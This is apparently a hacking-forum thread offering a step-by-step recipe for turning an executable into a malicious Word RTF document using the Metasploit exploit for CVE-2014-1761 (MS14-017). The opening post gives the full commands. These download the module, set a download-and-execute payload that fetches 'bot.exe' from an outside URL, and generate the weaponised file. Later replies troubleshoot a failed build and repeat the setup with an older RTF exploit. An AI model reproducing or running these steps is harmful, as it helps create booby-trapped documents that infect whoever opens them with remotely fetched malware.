MS Office 2003<>2013 RTF Exploit ( EXE to DOC ) ( CVE-2014-1761 ) Latest

[freaktechz]

Enjoy guys ! !

>
root@kali: cd*/opt/metasploit/apps/pro/msf3/data/exploits
root@kali:/opt/metasploit/apps/pro/msf3/data/exploits# curl -O -L [url]https://github.com/rapid7/metasploit-framework/raw/master/data/exploits/cve-2014-1761.rtf[/url] >cve-2014-1761.rtf*
root@kali:/opt/metasploit/apps/pro/msf3/data/exploits# chmod +x cve-2014-1761.rtf*
root@kali: cd ~/.msf4
[email="root@kali:~/.msf"]root@kali:~/.msf[/email]4# cd modules/
[email="root@kali:~/.msf"]root@kali:~/.msf[/email]4/modules# ls
exploits
[email="root@kali:~/.msf"]root@kali:~/.msf[/email]4/modules# cd exploits
[email="root@kali:~/.msf"]root@kali:~/.msf[/email]4/modules/exploits# mkdir windows
[email="root@kali:~/.msf"]root@kali:~/.msf[/email]4/modules/exploits# cd windows/
[email="root@kali:~/.msf"]root@kali:~/.msf[/email]4/modules/exploits/windows# mkdir misc
[email="root@kali:~/.msf"]root@kali:~/.msf[/email]4/modules/exploits/windows# cd misc
[email="root@kali:~/.msf"]root@kali:~/.msf[/email]4/modules/exploits/windows# curl -O -L*[url]https://github.com/rapid7/metasploit-framework/raw/master/modules/exploits/windows/fileformat/ms14_017_rtf.rb[/url] >ms14_017_rtf.rb
[email="root@kali:~/.msf"]root@kali:~/.msf[/email]4/modules/exploits/windows/misc# vim ms14_017_rtf.rb (verify if correct)
[email="root@kali:~/.msf"]root@kali:~/.msf[/email]4/modules/exploits/windows/misc# chmod +x ms14_017_rtf.rb
[email="root@kali:~/.msf"]root@kali:~/.msf[/email]4/modules/exploits/windows/misc# updatedb
[email="root@kali:~/.msf"]root@kali:~/.msf[/email]4/modules/exploits/windows/misc# msfconsole
* +-------------------------------------------------------+
* | *METASPLOIT by Rapid7 * * * * * * * * * * * * * * * * |
* +---------------------------+---------------------------+
* | * * *__________________ * | * * * * * * * * * * * * * |
* | *==c(______(o(______(_() *| |""""""""""""|======[*** *|
* | * * * * * * )=\ * * * * * | | *EXPLOIT * \ * * * * * *|
* | * * * * * *// \\ * * * * *| |_____________\_______ * *|
* | * * * * * // * \\ * * * * | |==[msf >]============\ * |
* | * * * * *// * * \\ * * * *| |______________________\ *|
* | * * * * // RECON \\ * * * | \(@)(@)(@)(@)(@)(@)(@)/ * |
* | * * * *// * * * * \\ * * *| ********************** * *|
* +---------------------------+---------------------------+
* | * * *o O o * * * * * * * *| * * * *\'\/\/\/'/ * * * * |
* | * * * * * * *o O * * * * *| * * * * )======( * * * * *|
* | * * * * * * * * o * * * * | * * * .' *LOOT *'. * * * *|
* | |^^^^^^^^^^^^^^|l___ * * *| * * */ * *_||__ * \ * * * |
* | | * *PAYLOAD * * |""\___, | * * / * *(_||_ * * \ * * *|
* | |________________|__|)__| | * *| * * __||_) * * | * * |
* | |(@)(@)"""**|(@)(@)**|(@) | * *" * * * || * * * " * * |
* | *= = = = = = = = = = = = *| * * '--------------' * * *|
* +---------------------------+---------------------------+
*
*
Using notepad to track pentests? Have Metasploit Pro report on hosts,
services, sessions and evidence -- type 'go_pro' to launch it now.
*
* * * *=[ metasploit v4.9.2-2014040906 [core:4.9 api:1.0] ]
+ -- --=[ 1300 exploits - 791 auxiliary - 217 post ]
+ -- --=[ 334 payloads - 35 encoders - 8 nops * * *]
*

msf > db_status
[*]postgresql connected to msf3
msf >*


msf > search rtf
*
Matching Modules
================
*
* *Name * * * * * * * * * * * * * * * * * * * * * * * * * *Disclosure Date * * * * *Rank * * * Description
* *---- * * * * * * * * * * * * * * * * * * * * * * * * * *--------------- * * * * *---- * * * -----------
exploit/windows/misc/ms14_017_rtf * * * * * * * * * * * * *2014-04-01 00:00:00 UTC *normal * * MS14-017 Microsoft Word RTF Object Confusion
...

Usage :

>
msf > use exploit/windows/fileformat/ms14_017_rtf
msf exploit(ms14_017_rtf) > set PAYLOAD windows/download_exec
PAYLOAD => windows/download_exec
msf exploit(ms14_017_rtf) > set EXE rundll.exe
EXE => rundll.exe
msf exploit(ms14_017_rtf) > set URL [url]http://www.u3rs.com/bin/bot.exe[/url]
URL => [url]http://www.u3rs.com/bin/bot.exe[/url]
msf exploit(ms14_017_rtf) > set EXITFUNC thread
EXITFUNC => thread
msf exploit(ms14_017_rtf) > exploit

[+] msf.rtf stored at /root/.msf4/local/msf.rtf
msf exploit(ms14_017_rtf) >

Format updated ! !

 

[x1337day]

Re: MS Office 2003<>2013 RTF Exploit ( EXE to DOC ) ( CVE-2014-1761 ) Latest

how to set this exploit on windows?

 

[hostbob]

Re: MS Office 2003<>2013 RTF Exploit ( EXE to DOC ) ( CVE-2014-1761 ) Latest

i have tried building this for awhile but it's not dropping my payload, only crash ms word but no payload being dropped. anyone has successfully work with this please share your experience

 

[freaktechz]

Re: MS Office 2003<>2013 RTF Exploit ( EXE to DOC ) ( CVE-2014-1761 ) Latest

how to set this exploit on windows?

Send PM with details ! !

 

[x1337day]

Re: MS Office 2003<>2013 RTF Exploit ( EXE to DOC ) ( CVE-2014-1761 ) Latest

can u post some direct download link ? no dropbox?

 

[x1337day]

Re: MS Office 2003<>2013 RTF Exploit ( EXE to DOC ) ( CVE-2014-1761 ) Latest

ok,where is error

msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof

msf exploit(ms10_087_rtf_pfragments_bof) > set PAYLOAD windows/download_exec

PAYLOAD => windows/download_exec

msf exploit(ms10_087_rtf_pfragments_bof) > set EXE rundll.exe

EXE => rundll.exe

URL =>

This link is hidden for visitors. Please Log in or register now.

_hash=AAEaeqQewhFEGuOclmbrwGqLJxKBCCvXkPA-s4r_3fG2sQ&expiry=1400775822

msf exploit(ms10_087_rtf_pfragments_bof) > set EXITFUNC thread

EXITFUNC => thread

msf exploit(ms10_087_rtf_pfragments_bof) > exploit

[-] Exploit failed: No encoders encoded the buffer successfully.

msf exploit(ms10_087_rtf_pfragments_bof) >